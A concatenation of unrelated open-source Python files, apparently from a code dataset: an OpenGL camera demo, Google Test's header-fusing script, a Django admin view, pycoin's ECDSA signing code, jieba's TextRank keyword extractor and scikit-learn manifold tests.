("pitch",1):quaternion.c_quaternion.pitch(+0.002),
("pitch",2):quaternion.c_quaternion.pitch(-0.002),
}
pass
#f set_camera
def set_camera(self, camera=None, orientation=None, yfov=None):
if camera is not None:
self.camera["position"] = list(camera)
pass
if orientation is not None:
self.camera["facing"] = orientation
pass
if yfov is not None:
self.camera["fov"] = yfov
pass
#f change_angle
def change_angle(self, angle, dirn, angle_delta=0.01 ):
if (self.camera["rpy"][angle]*dirn)<0:
self.camera["rpy"][angle]=0
pass
else:
self.camera["rpy"][angle] += dirn*angle_delta
pass
pass
#f change_position
def change_position(self, x,y,z ):
scale = 0.1+self.camera["speed"]*5
self.camera["position"] = [self.camera["position"][0]+x*scale,
self.camera["position"][1]+y*scale,
self.camera["position"][2]+z*scale
]
pass
#f change_fov
def change_fov(self, fov):
self.camera["fov"] += fov
if self.camera["fov"]<10: self.camera["fov"]=10
if self.camera["fov"]>140: self.camera["fov"]=140
pass
#f idle
def idle(self):
acceleration = 0.02
self.camera["speed"] = self.camera["speed"]*0.9
actions = {}
for c in self.camera_controls:
for action in self.camera_control_keys[c]:
(a,s,c) = action
if a in actions:
s = s | actions[a][0]
c = c | actions[a][1]
pass
actions[a] = (s,c)
pass
pass
for a in actions:
(s,c) = actions[a]
controls = s &~ c
if controls!=0:
if (a,controls) in self.camera_quats:
self.camera["facing"] = self.camera_quats[(a,controls)].copy().multiply(self.camera["facing"])
elif a=="speed":
self.camera["speed"] += acceleration*(2*controls-3)
if controls&4: self.camera["speed"]=0
elif a=="fov":
self.camera["fov"] *= 1+0.1*(2*controls-3)
pass
pass
if self.camera["speed"]!=0:
m = self.camera["facing"].get_matrix()
self.camera["position"][0] += self.camera["speed"]*m[0][2]
self.camera["position"][1] += self.camera["speed"]*m[1][2]
self.camera["position"][2] += self.camera["speed"]*m[2][2]
pass
pass
#f key_updown
def key_updown(self, key,m,x,y,key_down):
if key in self.camera_control_keys:
if key_down:
self.camera_controls.add(key)
pass
else:
self.camera_controls.discard(key)
pass
return True
pass
#f keyrelease
def keyrelease(self, key,m,x,y):
if self.key_updown(key,m,x,y,False):
return
pass
#f keypress
def keypress(self, key,m,x,y):
if self.key_updown(key,m,x,y,True):
return
if key==' ': self.camera["speed"] = 0
if key=='e': self.camera["rpy"] = [0,0,0]
if key=='r': self.camera["position"] = [0,0,-10]
if key=='r': self.camera["facing"] = quaternion.c_quaternion.identity()
if key=='r': self.camera["fov"] = 90
pass
#f opengl_post_init
def opengl_post_init(self):
pass
#f display
def display(self, show_crosshairs=False, focus_xxyyzz=None):
self.matrix_perspective(fovy=self.camera["fov"], aspect=self.aspect, zNear=self.zNear, zFar=self.zFar, matrix="project")
if self.mvp is not None:
self.mvp.perspective(self.camera["fov"],self.aspect,self.zNear,self.zFar)
pass
self.camera["facing"] = quaternion.c_quaternion.roll(self.camera["rpy"][0]).multiply(self.camera["facing"])
self.camera["facing"] = quaternion.c_quaternion.pitch(self.camera["rpy"][1]).multiply(self.camera["facing"])
self.camera["facing"] = quaternion.c_quaternion.yaw(self.camera["rpy"][2]).multiply(self.camera["facing"])
m = self.camera["facing"].get_matrixn(order=4)
self.camera["position"][0] += self.camera["speed"]*m[0,2]
self.camera["position"][1] += self.camera["speed"]*m[1,2]
self.camera["position"][2] += self.camera["speed"]*m[2,2]
if focus_xxyyzz is not None:
m2 = m.copy()
#m2.transpose()
#self.camera["position"] = vectors.vector_add((0,-1,0),m2.apply((0,0,-10,1))[0:3])
self.camera["position"] = vectors.vector_add((focus_xxyyzz[0],focus_xxyyzz[2],focus_xxyyzz[4]),
m2.apply((focus_xxyyzz[1],focus_xxyyzz[3],focus_xxyyzz[5],1))[0:3])
pass
self.matrix_set(m.transpose(), matrix="view")
self.matrix_translate(self.camera["position"], matrix="view")
self.matrix_identity(matrix="model")
if self.mvp is not None:
m3 = self.camera["facing"].get_matrix3()
self.mvp.mult3x3(m9=m3.matrix)
self.mvp.translate(self.camera["position"])
pass
glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)
if show_crosshairs: # Draw crosshairs
self.matrix_push("project")
self.matrix_push("view")
self.matrix_push("model")
self.matrix_identity("project")
self.matrix_identity("view")
self.matrix_identity("model")
self.shader_use("color_standard")
self.shader_set_attributes(C=(0.7,0.7,0.9))
self.matrix_use()
self.draw_lines((-1,0,-1,1,0,-1, 0,-1,-1,0,1,-1))
self.matrix_pop("project")
self.matrix_pop("view")
self.matrix_pop("model")
pass
pass
#f All done
pass
#a Test app
class c_opengl_test_app(c_opengl_camera_app):
use_primitive_restart = False
patches = { "flat_xy_square": ( (0,0,0), (1/3.0,0,0), (2/3.0,0,0), (1,0,0),
(0,1/3.0,0), (1/3.0,1/3.0,0), (2/3.0,1/3.0,0), (1,1/3.0,0),
(0,2/3.0,0), (1/3.0,2/3.0,0), (2/3.0,2/3.0,0), (1,2/3.0,0),
(0,1,0), (1/3.0,1,0), (2/3.0,1,0), (1,1,0),
),
"bump_one": ( (0,0,0), (0.1,0,0.1), (0.9,0,0.1), (1,0,0),
(0,0.1,0.1), (0.1,0.1,0.1), (0.9,0.1,0.1), (1,0.1,0.1),
(0,0.9,0.1), (0.1,0.9,0.1), (0.9,0.9,0.1), (1,0.9,0.1),
(0,1,0), (0.1,1,0.1), (0.9,1,0.1), (1,1,0),
),
"bump_two": ( (0,0,0), (0.2,-0.2,0.2), (0.8,-0.2,0.2), (1,0,0),
(-0.2,0.2,0.2), (0.2,0.2,-0.1), (0.8,0.2,-0.1), (1.2,0.2,0.2),
(-0.2,0.8,0.2), (0.2,0.8,-0.1), (0.8,0.8,-0.1), (1.2,0.8,0.2),
(0,1,0), (0.2,1.2,0.2), (0.8,1.2,0.2), (1,1,0),
),
}
#f __init__
def __init__(self, patch_name, **kwargs):
c_opengl_camera_app.__init__(self, **kwargs)
self.patch = self.patches[patch_name]
self.opengl_surface = {}
self.xxx = 0.0
self.yyy = 0.0
self.window_title = "OpenGL Test app '%s'"%patch_name
pass
#f opengl_post_init
def opengl_post_init(self):
from gjslib.math import bezier
from ctypes import sizeof, c_float, c_void_p, c_uint
pts = []
for coords in self.patch:
pts.append( bezier.c_point(coords=coords) )
pass
bp = bezier.c_bezier_patch( pts=pts )
float_size = sizeof(c_float)
vertex_offset = c_void_p(0 * float_size)
normal_offset = c_void_p(3 * float_size)
record_len = 6 * float_size
data_array = []
n = 14
for i in range(n+1):
for j in range(n+1):
data_array.append( bp.coord(i/(n+0.0),j/(n+0.0)).get_coords(scale=(2.0,2.0,2.0),offset=(-1.,-1.0,.0)) )
data_array.append( bp.normal(i/(n+0.0),j/(n+0.0)).get_coords() )
pass
pass
vertices = vbo.VBO( data=numpy.array(data_array, dtype=numpy.float32) )
index_list = []
if self.use_primitive_restart:
glEnable(GL_PRIMITIVE_RESTART)
pass
for j in range(n):
for i in range(n+1):
index_list.append( i+j*(n+1) )
index_list.append( i+(j+1)*(n+1) )
pass
if j<(n-1):
if self.use_primitive_restart:
index_list.append( 255 )
pass
else:
index_list.append( (n)+(j+1)*(n+1) )
index_list.append( (n)+(j+1)*(n+1) )
index_list.append( (j+1)*(n+1) )
index_list.append( (j+1)*(n+1) )
pass
pass
print index_list
indices = vbo.VBO( data=numpy.array( index_list, dtype=numpy.uint8),
target=GL_ELEMENT_ARRAY_BUFFER )
vertices.bind()
indices.bind()
self.opengl_surface["vertices"] = vertices
self.opengl_surface["indices"] = indices
self.opengl_surface["vertex_offset"] = vertex_offset
self.opengl_surface["normal_offset"] = normal_offset
self.opengl_surface["record_len"] = record_len
pass
#f display
def display(self):
c_opengl_camera_app.display(self)
self.yyy += 0.03
lightZeroPosition = [4.+3*math.sin(self.yyy),4.,4.-3*math.cos(self.yyy),1.]
lightZeroColor = [0.7,1.0,0.7,1.0] #white
ambient_lightZeroColor = [1.0,1.0,1.0,1.0] #green tinged
glLightfv(GL_LIGHT0, GL_POSITION, lightZeroPosition)
glLightfv(GL_LIGHT0, GL_DIFFUSE, lightZeroColor)
glLightf(GL_LIGHT0, GL_CONSTANT_ATTENUATION, 0.1)
glLightf(GL_LIGHT0, GL_LINEAR_ATTENUATION, 0.05)
glEnable(GL_LIGHT0)
glLightfv(GL_LIGHT1, GL_AMBIENT, ambient_lightZeroColor)
glEnable(GL_LIGHT1)
glPushMatrix()
color = [1.0,0.,0.,1.]
glMaterialfv(GL_FRONT,GL_DIFFUSE,[1.0,1.0,1.0,1.0])
glMaterialfv(GL_FRONT,GL_AMBIENT,[1.0,1.0,1.0,1.0])
glTranslate(lightZeroPosition[0],lightZeroPosition[1],lightZeroPosition[2])
glScale(0.3,0.3,0.3)
glutSolidSphere(2,40,40)
glPopMatrix()
glMaterialfv(GL_FRONT,GL_AMBIENT,[0.1,0.1,0.1,1.0])
glPushMatrix()
#glTranslate(0.0 ,2.75, 0.0)
color = [0.5,0,0.,0.,1.]
glMaterialfv(GL_FRONT,GL_DIFFUSE,color)
#glutSolidSphere(2,40,40)
glutSolidOctahedron()
glPopMatrix()
glPushMatrix()
self.xxx += 0.3
brightness = 0.4
glRotate(self.xxx,1,1,0)
glTranslate(0.0 ,-0.75, 0.0)
glMaterialfv(GL_FRONT,GL_DIFFUSE,[brightness*1.0,brightness*1.,brightness*0.,1.])
glPushMatrix()
glTranslate(0,0,1)
self.draw_object()
glPopMatrix()
glPushMatrix()
glRotate(180,0,1,0)
glTranslate(0,0,1)
self.draw_object()
glPopMatrix()
glMaterialfv(GL_FRONT,GL_DIFFUSE,[brightness*0.5,brightness*1.,brightness*0.,1.])
glPushMatrix()
glRotate(-90,0,1,0)
glTranslate(0,0,1)
self.draw_object()
glPopMatrix()
glPushMatrix()
glRotate(90,0,1,0)
glTranslate(0,0,1)
self.draw_object()
glPopMatrix()
glMaterialfv(GL_FRONT,GL_DIFFUSE,[brightness*0,brightness*0.5,brightness*0.5,1.])
glPushMatrix()
glRotate(-90,1,0,0)
glTranslate(0,0,1)
self.draw_object()
glPopMatrix()
glPushMatrix()
glRotate(90,1,0,0)
glTranslate(0,0,1)
self.draw_object()
glPopMatrix()
glPopMatrix()
glutSwapBuffers()
pass
#f draw_object
def draw_object(self):
self.opengl_surface["vertices"].bind()
glEnableClientState(GL_VERTEX_ARRAY)
glEnableClientState(GL_VERTEX_ARRAY)
glEnableClientState(GL_NORMAL_ARRAY)
glVertexPointer( 3, GL_FLOAT, self.opengl_surface["record_len"], self.opengl_surface["vertex_offset"] )
glNormalPointer( GL_FLOAT, self.opengl_surface["record_len"], self.opengl_surface["normal_offset"])
self.opengl_surface["indices"].bind()
glDrawElements( GL_TRIANGLE_STRIP,
len(self.opengl_surface["indices"]),
GL_UNSIGNED_BYTE,
self.opengl_surface["indices"] )
pass
#f All done
pass
#a Toplevel
if __name__ == '__main__':
a = c_opengl_test_app(patch_name="bump_one", window_size=(1000,1000))
a.init_opengl()
a.main_loop()
pass
| apache-2.0 |
EvgeneOskin/oce | test/gtest-1.7.0/scripts/fuse_gtest_files.py | 2577 | 8813 | #!/usr/bin/env python
#
# Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""fuse_gtest_files.py v0.2.0
Fuses Google Test source code into a .h file and a .cc file.
SYNOPSIS
fuse_gtest_files.py [GTEST_ROOT_DIR] OUTPUT_DIR
Scans GTEST_ROOT_DIR for Google Test source code, and generates
two files: OUTPUT_DIR/gtest/gtest.h and OUTPUT_DIR/gtest/gtest-all.cc.
Then you can build your tests by adding OUTPUT_DIR to the include
search path and linking with OUTPUT_DIR/gtest/gtest-all.cc. These
two files contain everything you need to use Google Test. Hence
you can "install" Google Test by copying them to wherever you want.
GTEST_ROOT_DIR can be omitted and defaults to the parent
directory of the directory holding this script.
EXAMPLES
./fuse_gtest_files.py fused_gtest
./fuse_gtest_files.py path/to/unpacked/gtest fused_gtest
This tool is experimental. In particular, it assumes that there is no
conditional inclusion of Google Test headers. Please report any
problems to googletestframework@googlegroups.com. You can read
http://code.google.com/p/googletest/wiki/GoogleTestAdvancedGuide for
more information.
"""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import re
import sets
import sys
# We assume that this file is in the scripts/ directory in the Google
# Test root directory.
DEFAULT_GTEST_ROOT_DIR = os.path.join(os.path.dirname(__file__), '..')
# Regex for matching '#include "gtest/..."'.
INCLUDE_GTEST_FILE_REGEX = re.compile(r'^\s*#\s*include\s*"(gtest/.+)"')
# Regex for matching '#include "src/..."'.
INCLUDE_SRC_FILE_REGEX = re.compile(r'^\s*#\s*include\s*"(src/.+)"')
# Where to find the source seed files.
GTEST_H_SEED = 'include/gtest/gtest.h'
GTEST_SPI_H_SEED = 'include/gtest/gtest-spi.h'
GTEST_ALL_CC_SEED = 'src/gtest-all.cc'
# Where to put the generated files.
GTEST_H_OUTPUT = 'gtest/gtest.h'
GTEST_ALL_CC_OUTPUT = 'gtest/gtest-all.cc'
def VerifyFileExists(directory, relative_path):
"""Verifies that the given file exists; aborts on failure.
relative_path is the file path relative to the given directory.
"""
if not os.path.isfile(os.path.join(directory, relative_path)):
print 'ERROR: Cannot find %s in directory %s.' % (relative_path,
directory)
print ('Please either specify a valid project root directory '
'or omit it on the command line.')
sys.exit(1)
def ValidateGTestRootDir(gtest_root):
"""Makes sure gtest_root points to a valid gtest root directory.
The function aborts the program on failure.
"""
VerifyFileExists(gtest_root, GTEST_H_SEED)
VerifyFileExists(gtest_root, GTEST_ALL_CC_SEED)
def VerifyOutputFile(output_dir, relative_path):
"""Verifies that the given output file path is valid.
relative_path is relative to the output_dir directory.
"""
# Makes sure the output file either doesn't exist or can be overwritten.
output_file = os.path.join(output_dir, relative_path)
if os.path.exists(output_file):
# TODO(wan@google.com): The following user-interaction doesn't
# work with automated processes. We should provide a way for the
# Makefile to force overwriting the files.
print ('%s already exists in directory %s - overwrite it? (y/N) ' %
(relative_path, output_dir))
answer = sys.stdin.readline().strip()
if answer not in ['y', 'Y']:
print 'ABORTED.'
sys.exit(1)
# Makes sure the directory holding the output file exists; creates
# it and all its ancestors if necessary.
parent_directory = os.path.dirname(output_file)
if not os.path.isdir(parent_directory):
os.makedirs(parent_directory)
def ValidateOutputDir(output_dir):
"""Makes sure output_dir points to a valid output directory.
The function aborts the program on failure.
"""
VerifyOutputFile(output_dir, GTEST_H_OUTPUT)
VerifyOutputFile(output_dir, GTEST_ALL_CC_OUTPUT)
def FuseGTestH(gtest_root, output_dir):
"""Scans folder gtest_root to generate gtest/gtest.h in output_dir."""
output_file = file(os.path.join(output_dir, GTEST_H_OUTPUT), 'w')
processed_files = sets.Set() # Holds all gtest headers we've processed.
def ProcessFile(gtest_header_path):
"""Processes the given gtest header file."""
# We don't process the same header twice.
if gtest_header_path in processed_files:
return
processed_files.add(gtest_header_path)
# Reads each line in the given gtest header.
for line in file(os.path.join(gtest_root, gtest_header_path), 'r'):
m = INCLUDE_GTEST_FILE_REGEX.match(line)
if m:
# It's '#include "gtest/..."' - let's process it recursively.
ProcessFile('include/' + m.group(1))
else:
# Otherwise we copy the line unchanged to the output file.
output_file.write(line)
ProcessFile(GTEST_H_SEED)
output_file.close()
def FuseGTestAllCcToFile(gtest_root, output_file):
"""Scans folder gtest_root to generate gtest/gtest-all.cc in output_file."""
processed_files = sets.Set()
def ProcessFile(gtest_source_file):
"""Processes the given gtest source file."""
# We don't process the same #included file twice.
if gtest_source_file in processed_files:
return
processed_files.add(gtest_source_file)
# Reads each line in the given gtest source file.
for line in file(os.path.join(gtest_root, gtest_source_file), 'r'):
m = INCLUDE_GTEST_FILE_REGEX.match(line)
if m:
if 'include/' + m.group(1) == GTEST_SPI_H_SEED:
# It's '#include "gtest/gtest-spi.h"'. This file is not
# #included by "gtest/gtest.h", so we need to process it.
ProcessFile(GTEST_SPI_H_SEED)
else:
# It's '#include "gtest/foo.h"' where foo is not gtest-spi.
# We treat it as '#include "gtest/gtest.h"', as all other
# gtest headers are being fused into gtest.h and cannot be
# #included directly.
# There is no need to #include "gtest/gtest.h" more than once.
if not GTEST_H_SEED in processed_files:
processed_files.add(GTEST_H_SEED)
output_file.write('#include "%s"\n' % (GTEST_H_OUTPUT,))
else:
m = INCLUDE_SRC_FILE_REGEX.match(line)
if m:
# It's '#include "src/foo"' - let's process it recursively.
ProcessFile(m.group(1))
else:
output_file.write(line)
ProcessFile(GTEST_ALL_CC_SEED)
def FuseGTestAllCc(gtest_root, output_dir):
"""Scans folder gtest_root to generate gtest/gtest-all.cc in output_dir."""
output_file = file(os.path.join(output_dir, GTEST_ALL_CC_OUTPUT), 'w')
FuseGTestAllCcToFile(gtest_root, output_file)
output_file.close()
def FuseGTest(gtest_root, output_dir):
"""Fuses gtest.h and gtest-all.cc."""
ValidateGTestRootDir(gtest_root)
ValidateOutputDir(output_dir)
FuseGTestH(gtest_root, output_dir)
FuseGTestAllCc(gtest_root, output_dir)
def main():
argc = len(sys.argv)
if argc == 2:
# fuse_gtest_files.py OUTPUT_DIR
FuseGTest(DEFAULT_GTEST_ROOT_DIR, sys.argv[1])
elif argc == 3:
# fuse_gtest_files.py GTEST_ROOT_DIR OUTPUT_DIR
FuseGTest(sys.argv[1], sys.argv[2])
else:
print __doc__
sys.exit(1)
if __name__ == '__main__':
main()
| lgpl-2.1 |
olebole/astrometry.net | net/views/admin.py | 2 | 1403 |
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseBadRequest, QueryDict
from django.shortcuts import render_to_response, get_object_or_404, redirect
from django.template import Context, RequestContext, loader
from django.contrib.auth.decorators import login_required
from astrometry.net.models import *
from astrometry.net import settings
from astrometry.net.log import *
from astrometry.net.tmpfile import *
def index(req):
ps = ProcessSubmissions.objects.all().order_by('-watchdog')
logmsg('ProcessSubmissions:', ps)
return render_to_response('admin.html',
{ 'procsubs':ps,
},
context_instance = RequestContext(req))
def procsub(req, psid=None):
ps = get_object_or_404(ProcessSubmissions, pk=psid)
logmsg('ProcessSubmission:', ps)
logmsg('jobs:', ps.jobs.all())
for j in ps.jobs.all():
logmsg(' ', j)
logmsg(' ', j.job)
logmsg(' ', j.job.user_image)
logmsg(' ', j.job.user_image.submission)
now = datetime.now()
now = now.replace(microsecond=0)
now = now.isoformat()
return render_to_response('procsub.html',
{ 'procsub':ps,
'now':now,
},
context_instance = RequestContext(req))
| bsd-3-clause |
thirdkey-solutions/pycoin | pycoin/ecdsa/ecdsa.py | 20 | 6140 |
"""
Some portions adapted from https://github.com/warner/python-ecdsa/ Copyright (c) 2010 Brian Warner
who granted its use under this license:
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
Portions written in 2005 by Peter Pearson and placed in the public domain.
"""
import hashlib
import hmac
from .. import intbytes
from . import ellipticcurve, numbertheory
if hasattr(1, "bit_length"):
bit_length = lambda v: v.bit_length()
else:
def bit_length(self):
# Make this library compatible with python < 2.7
# https://docs.python.org/3.5/library/stdtypes.html#int.bit_length
s = bin(self) # binary representation: bin(-37) --> '-0b100101'
s = s.lstrip('-0b') # remove leading zeros and minus sign
return len(s) # len('100101') --> 6
def deterministic_generate_k(generator_order, secret_exponent, val, hash_f=hashlib.sha256):
"""
Generate K value according to https://tools.ietf.org/html/rfc6979
"""
n = generator_order
order_size = (bit_length(n) + 7) // 8
hash_size = hash_f().digest_size
v = b'\x01' * hash_size
k = b'\x00' * hash_size
priv = intbytes.to_bytes(secret_exponent, length=order_size)
shift = 8 * hash_size - bit_length(n)
if shift > 0:
val >>= shift
if val > n:
val -= n
h1 = intbytes.to_bytes(val, length=order_size)
k = hmac.new(k, v + b'\x00' + priv + h1, hash_f).digest()
v = hmac.new(k, v, hash_f).digest()
k = hmac.new(k, v + b'\x01' + priv + h1, hash_f).digest()
v = hmac.new(k, v, hash_f).digest()
while 1:
t = bytearray()
while len(t) < order_size:
v = hmac.new(k, v, hash_f).digest()
t.extend(v)
k1 = intbytes.from_bytes(bytes(t))
k1 >>= (len(t)*8 - bit_length(n))
if k1 >= 1 and k1 < n:
return k1
k = hmac.new(k, v + b'\x00', hash_f).digest()
v = hmac.new(k, v, hash_f).digest()
def sign(generator, secret_exponent, val):
"""Return a signature for the provided hash, using the provided
random nonce. It is absolutely vital that random_k be an unpredictable
number in the range [1, self.public_key.point.order()-1]. If
an attacker can guess random_k, he can compute our private key from a
single signature. Also, if an attacker knows a few high-order
bits (or a few low-order bits) of random_k, he can compute our private
key from many signatures. The generation of nonces with adequate
cryptographic strength is very difficult and far beyond the scope
of this comment.
May raise RuntimeError, in which case retrying with a new
random value k is in order.
"""
G = generator
n = G.order()
k = deterministic_generate_k(n, secret_exponent, val)
p1 = k * G
r = p1.x()
if r == 0: raise RuntimeError("amazingly unlucky random number r")
s = ( numbertheory.inverse_mod( k, n ) * \
( val + ( secret_exponent * r ) % n ) ) % n
if s == 0: raise RuntimeError("amazingly unlucky random number s")
return (r, s)
def public_pair_for_secret_exponent(generator, secret_exponent):
return (generator*secret_exponent).pair()
def public_pair_for_x(generator, x, is_even):
curve = generator.curve()
p = curve.p()
alpha = ( pow(x, 3, p) + curve.a() * x + curve.b() ) % p
beta = numbertheory.modular_sqrt(alpha, p)
if is_even == bool(beta & 1):
return (x, p - beta)
return (x, beta)
def is_public_pair_valid(generator, public_pair):
return generator.curve().contains_point(public_pair[0], public_pair[1])
def verify(generator, public_pair, val, signature):
"""
Verify that signature is a valid signature of hash.
Return True if the signature is valid.
"""
# From X9.62 J.3.1.
G = generator
n = G.order()
r, s = signature
if r < 1 or r > n-1: return False
if s < 1 or s > n-1: return False
c = numbertheory.inverse_mod( s, n )
u1 = ( val * c ) % n
u2 = ( r * c ) % n
point = u1 * G + u2 * ellipticcurve.Point( G.curve(), public_pair[0], public_pair[1], G.order() )
v = point.x() % n
return v == r
def possible_public_pairs_for_signature(generator, value, signature):
""" See http://www.secg.org/download/aid-780/sec1-v2.pdf for the math """
G = generator
curve = G.curve()
order = G.order()
p = curve.p()
r,s = signature
possible_points = set()
#recid = nV - 27
# 1.1
inv_r = numbertheory.inverse_mod(r,order)
minus_e = -value % order
x = r
# 1.3
alpha = ( pow(x,3,p) + curve.a() * x + curve.b() ) % p
beta = numbertheory.modular_sqrt(alpha, p)
for y in [beta, p - beta]:
# 1.4 the constructor checks that nR is at infinity
R = ellipticcurve.Point(curve, x, y, order)
# 1.6 compute Q = r^-1 (sR - eG)
Q = inv_r * ( s * R + minus_e * G )
public_pair = (Q.x(), Q.y())
# check that Q is the public key
if verify(generator, public_pair, value, signature):
# check that we get the original signing address
possible_points.add(public_pair)
return possible_points
| mit |
fbukevin/jieba | jieba/analyse/textrank.py | 57 | 3491 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import sys
from operator import itemgetter
from collections import defaultdict
import jieba.posseg
from .tfidf import KeywordExtractor
from .._compat import *
class UndirectWeightedGraph:
d = 0.85
def __init__(self):
self.graph = defaultdict(list)
def addEdge(self, start, end, weight):
# use a tuple (start, end, weight) instead of a Edge object
self.graph[start].append((start, end, weight))
self.graph[end].append((end, start, weight))
def rank(self):
ws = defaultdict(float)
outSum = defaultdict(float)
wsdef = 1.0 / (len(self.graph) or 1.0)
for n, out in self.graph.items():
ws[n] = wsdef
outSum[n] = sum((e[2] for e in out), 0.0)
# this line for build stable iteration
sorted_keys = sorted(self.graph.keys())
for x in xrange(10): # 10 iters
for n in sorted_keys:
s = 0
for e in self.graph[n]:
s += e[2] / outSum[e[1]] * ws[e[1]]
ws[n] = (1 - self.d) + self.d * s
(min_rank, max_rank) = (sys.float_info[0], sys.float_info[3])
for w in itervalues(ws):
if w < min_rank:
min_rank = w
elif w > max_rank:
max_rank = w
for n, w in ws.items():
# to unify the weights, don't *100.
ws[n] = (w - min_rank / 10.0) / (max_rank - min_rank / 10.0)
return ws
class TextRank(KeywordExtractor):
def __init__(self):
self.tokenizer = self.postokenizer = jieba.posseg.dt
self.stop_words = self.STOP_WORDS.copy()
self.pos_filt = frozenset(('ns', 'n', 'vn', 'v'))
self.span = 5
def pairfilter(self, wp):
return (wp.flag in self.pos_filt and len(wp.word.strip()) >= 2
and wp.word.lower() not in self.stop_words)
def textrank(self, sentence, topK=20, withWeight=False, allowPOS=('ns', 'n', 'vn', 'v')):
"""
Extract keywords from sentence using TextRank algorithm.
Parameter:
- topK: return how many top keywords. `None` for all possible words.
- withWeight: if True, return a list of (word, weight);
if False, return a list of words.
- allowPOS: the allowed POS list eg. ['ns', 'n', 'vn', 'v'].
if the POS of w is not in this list, it will be filtered.
"""
self.pos_filt = frozenset(allowPOS)
g = UndirectWeightedGraph()
cm = defaultdict(int)
words = tuple(self.tokenizer.cut(sentence))
for i, wp in enumerate(words):
if self.pairfilter(wp):
for j in xrange(i + 1, i + self.span):
if j >= len(words):
break
if not self.pairfilter(words[j]):
continue
cm[(wp.word, words[j].word)] += 1
for terms, w in cm.items():
g.addEdge(terms[0], terms[1], w)
nodes_rank = g.rank()
if withWeight:
tags = sorted(nodes_rank.items(), key=itemgetter(1), reverse=True)
else:
tags = sorted(nodes_rank, key=nodes_rank.__getitem__, reverse=True)
if topK:
return tags[:topK]
else:
return tags
extract_tags = textrank
| mit |
shusenl/scikit-learn | sklearn/manifold/tests/test_locally_linear.py | 232 | 4761 | from itertools import product
from nose.tools import assert_true
import numpy as np
from numpy.testing import assert_almost_equal, assert_array_almost_equal
from scipy import linalg
from sklearn import neighbors, manifold
from sklearn.manifold.locally_linear import barycenter_kneighbors_graph
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import ignore_warnings
eigen_solvers = ['dense', 'arpack']
#----------------------------------------------------------------------
# Test utility routines
def test_barycenter_kneighbors_graph():
X = np.array([[0, 1], [1.01, 1.], [2, 0]])
A = barycenter_kneighbors_graph(X, 1)
assert_array_almost_equal(
A.toarray(),
[[0., 1., 0.],
[1., 0., 0.],
[0., 1., 0.]])
A = barycenter_kneighbors_graph(X, 2)
# check that columns sum to one
assert_array_almost_equal(np.sum(A.toarray(), 1), np.ones(3))
pred = np.dot(A.toarray(), X)
assert_less(linalg.norm(pred - X) / X.shape[0], 1)
#----------------------------------------------------------------------
# Test LLE by computing the reconstruction error on some manifolds.
def test_lle_simple_grid():
# note: ARPACK is numerically unstable, so this test will fail for
# some random seeds. We choose 2 because the tests pass.
rng = np.random.RandomState(2)
tol = 0.1
# grid of equidistant points in 2D, n_components = n_dim
X = np.array(list(product(range(5), repeat=2)))
X = X + 1e-10 * rng.uniform(size=X.shape)
n_components = 2
clf = manifold.LocallyLinearEmbedding(n_neighbors=5,
n_components=n_components,
random_state=rng)
tol = 0.1
N = barycenter_kneighbors_graph(X, clf.n_neighbors).toarray()
reconstruction_error = linalg.norm(np.dot(N, X) - X, 'fro')
assert_less(reconstruction_error, tol)
for solver in eigen_solvers:
clf.set_params(eigen_solver=solver)
clf.fit(X)
assert_true(clf.embedding_.shape[1] == n_components)
reconstruction_error = linalg.norm(
np.dot(N, clf.embedding_) - clf.embedding_, 'fro') ** 2
assert_less(reconstruction_error, tol)
assert_almost_equal(clf.reconstruction_error_,
reconstruction_error, decimal=1)
# re-embed a noisy version of X using the transform method
noise = rng.randn(*X.shape) / 100
X_reembedded = clf.transform(X + noise)
assert_less(linalg.norm(X_reembedded - clf.embedding_), tol)
def test_lle_manifold():
rng = np.random.RandomState(0)
# similar test on a slightly more complex manifold
X = np.array(list(product(np.arange(18), repeat=2)))
X = np.c_[X, X[:, 0] ** 2 / 18]
